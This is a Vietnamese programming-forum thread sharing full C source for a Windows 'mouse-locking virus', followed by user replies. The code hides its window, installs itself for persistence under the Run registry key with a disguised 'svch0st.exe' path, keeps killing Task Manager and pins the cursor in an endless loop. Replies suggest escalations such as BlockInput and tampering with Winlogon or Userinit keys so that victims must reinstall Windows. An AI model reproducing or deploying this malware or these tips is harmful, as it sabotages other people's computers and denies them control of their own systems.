Viết virus khóa chuột - Lập trình virus trên C

[nhunhamnho]

Yêu cầu ai copy paste thì ghi rõ nhé bài viết thuộc về congdongcviet nhé

Mã:

#include <windows.h>#include <winbase.h>#include <tlhelp32.h>#include <ctype.h>#include <string.h> #define BUFSIZE 90 int test_key(void);int create_key(char *);int kill(void); BOOL KillProcess(LPSTR lpszExecutable){    BOOL bResult = FALSE;    PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };    HANDLE hProcess, hProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if(Process32First(hProcesses, &pe32)){        do{            if(CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, pe32.szExeFile, -1, lpszExecutable, -1) == CSTR_EQUAL){                if((hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID)) != NULL){                    TerminateProcess(hProcess, 0); CloseHandle(hProcess); bResult = TRUE;                }            }        }while(Process32Next(hProcesses, &pe32));        CloseHandle(hProcesses);    }    return bResult;}   int main(void){    int test,create;    test=test_key();     if (test==2)    {        char *path="c:\\WINDOWS\\svch0st.exe";        create=create_key(path);     } HWND inv;    AllocConsole();    inv=FindWindowA("ConsoleWindowClass",NULL);    ShowWindow(inv,0);int c;for(c=0;c<999999999999;c++){kill();SetCursorPos(1,900);Sleep(9);}} int test_key(void){    int check;    HKEY hKey;    char path[BUFSIZE];    DWORD buf_length=BUFSIZE;    int reg_key;     reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);    if(reg_key!=0)    {        check=1;        return check;    }     reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);     if((reg_key!=0)||(buf_length>BUFSIZE))        check=2;    if(reg_key==0)        check=0;     RegCloseKey(hKey);    return check;} int create_key(char *path){        int reg_key,check;         HKEY hkey;         reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);        if(reg_key==0)        {                RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));                check=0;                return check;        }        if(reg_key!=0)                check=1;         return check;} int kill(void){return KillProcess("taskmgr.exe");}

View more random threads:

• học phần mềm có làm được trình duyệt viruts không?
• Bạn sẽ làm gì khi máy tính bị nhiễm virus?
• Cách Build Botnet/Virus Rxbot in VC++6.0 như thế nào?
• Cách viết một con virus đơn giản?
• Các kĩ thuật ẩn lời gọi hàm API trên Win32 [Tài liệu tổng hợp]
• Mã nguồn chương trình quyét virus viết trên VC++ 2008
• Cơ chế phát hiện mã độc của AV là gì ?
• Virus Reader_s Mở IEXPLORE.EXE ẩn cửa sổ bằng cách nào nhỉ ?
• Mã nguồn virus viết bằng C(củ chuối)
• Code virut viết bằng C, tác dụng của nó như thế nào?

[zincos]

@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win [IMG]images/smilies/biggrin.png[/IMG]

[doikonhulamo]

Hị hị.
Hồi trước cũng có tập tành viết virus.
Nhưng bi h có thêm mấy cái quản lý process rồi. kiểu này cũng dễ chống lắm.
Cái của bác coder_gate là kill lun task khi gọi thì dùng chương trình quản lý khác để kill con này. Còn nếu disable task như bác mèo nói thì vào regetry lấy lại [IMG]images/smilies/biggrin.png[/IMG] Cách mà mún cho ng khác cài lại win nhanh nhất là reg lại key winlogon hoặc key của userinit. thằng nào không bik dùng dos là chít lun [IMG]images/smilies/wink.png[/IMG])

[honghoa]

hay hy vọng mấy bác chỉ giáo thêm
em đang học c mà hok hiểu ứng dụng, công dụng có thể làm gì và làm ??????
nên nhiều khi cũng nản
may nhờ đọc bài này thấy thay đổi hẳn

[suckhoenhakhoa247]

con này củ chuối ấy mà,lâu lâu thì up lên shared thôi chứ có mấy ý nghĩa đâu [IMG]images/smilies/smile.png[/IMG]

[sieumuanhanh]

Hị hị.
Hồi trước cũng có tập tành viết virus.
Nhưng bi h có thêm mấy cái quản lý process rồi. kiểu này cũng dễ chống lắm.
Cái của bác coder_gate là kill lun task khi gọi thì dùng chương trình quản lý khác để kill con này. Còn nếu disable task như bác mèo nói thì vào regetry lấy lại [IMG]images/smilies/biggrin.png[/IMG]

Bạn vào được registry bằng cách nào khi cả bản phím và chuột đều bị đơ ? Trừ phi người dùng sửa stick key thành cmd để chạy regedit trước khi login.

[b2ltpt]

@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win [IMG]images/smilies/biggrin.png[/IMG]

Sao phải cài lại win cho mất công vậy.Bạn quên win còn khởi động ở chế độ safemode à.

[gaukhunglong]

Cho hỏi có mã nguồn trên rồi thì làm sao nữa???Hay là biên dịch trên máy mình luôn? Lỡ chính máy mình dính thì sao.
Em gà lắm, đừng chọc em

[congdong3]

dính thì xóa phát là xong chứ gì đâu,thêm nữa biên dịch trên VC++ nha

[haicauhoan]

@coder_gate : sao cậu không BlockInput lại cho nhanh, làm vậy chỉ cần kết hợp với disable taskmanager thì 80% là phải cài lại win [IMG]images/smilies/biggrin.png[/IMG]

cách bloginput kiểu ji vậy a mèo nói rõ cho cả nha nghe được ko vậy [IMG]images/smilies/17.gif[/IMG]